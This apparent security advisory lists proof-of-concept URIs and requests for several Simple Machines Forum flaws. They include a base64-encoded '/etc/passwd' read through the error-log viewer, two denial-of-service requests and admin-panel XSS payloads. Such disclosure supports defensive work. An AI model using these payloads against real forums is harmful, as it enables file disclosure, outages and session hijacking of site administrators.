Simple Machines Forum Multiple Security Vulnerabilities

Simple Machines Forum Multiple Security Vulnerabilities

An attacker can use a browser to exploit these issues. To exploit the cross-site scripting and cross-site request-forgery vulnerabilities, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

Information disclosure:
http://www.example.com/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q==

Denial of service:
GET /.xml.html;sa=news;limit=999;type=rss HTTP/1.1

Denial of service (cookie):
Cookie: GLOBALS

Cross-site scripting:
http://www.example.com/index.php?action=admin;area=languages;sa=add;[token]
PoC: "><xss>

http://www.example.com/index.php?action=admin;area=theme;sa=settings;th=2;[token]
PoC: http://urlreal"><script>alert(1);</script>